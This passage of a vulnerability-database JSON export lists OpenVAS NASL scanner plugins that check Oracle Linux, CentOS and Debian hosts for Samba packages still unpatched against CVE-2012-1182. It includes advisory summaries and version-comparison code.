(__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:45", "description": "Oracle Linux Local Security Checks ELSA-2013-0506", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0506", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123695", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123695", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0506.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123695\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:07:21 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0506\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0506 - samba4 security, bug fix and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0506\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0506.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881179", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018565.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881179\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:34:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libsmbclient'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for samba3x CESA-2012:0466 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881228", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881228", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba3x CESA-2012:0466 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018561.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881228\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:53:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0466\");\n script_name(\"CentOS Update for samba3x CESA-2012:0466 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba3x'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"samba3x on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:42", "description": "The remote host is missing an update to samba\nannounced via advisory DSA 2450-1.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2450-1 (samba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:71254", "href": "http://plugins.openvas.org/nasl.php?oid=71254", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2450_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2450-1 (samba)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that Samba, the SMB/CIFS file, print, and login server,\ncontained a flaw in the remote procedure call (RPC) code which allowed\nremote code execution as the super user from an unauthenticated\nconnection.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:3.6.4-1.\n\nWe recommend that you upgrade your samba packages.\";\ntag_summary = \"The remote host is missing an update to samba\nannounced via advisory DSA 2450-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202450-1\";\n\nif(description)\n{\n script_id(71254);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-1182\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:56:34 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Debian Security Advisory DSA 2450-1 (samba)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libpam-smbpass\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-dbg\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-doc\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-doc-pdf\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-tools\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"swat\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"winbind\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-08T12:57:23", "description": "Check for the Version of libsmbclient", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-08T00:00:00", "id": "OPENVAS:881194", "href": "http://plugins.openvas.org/nasl.php?oid=881194", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n \n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"libsmbclient on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-April/018562.html\");\n script_id(881194);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:40:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libsmbclient\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-11T11:06:26", "description": "Check for the Version of samba3x", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for samba3x CESA-2012:0466 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-10T00:00:00", "id": "OPENVAS:881228", "href": "http://plugins.openvas.org/nasl.php?oid=881228", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba3x CESA-2012:0466 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, 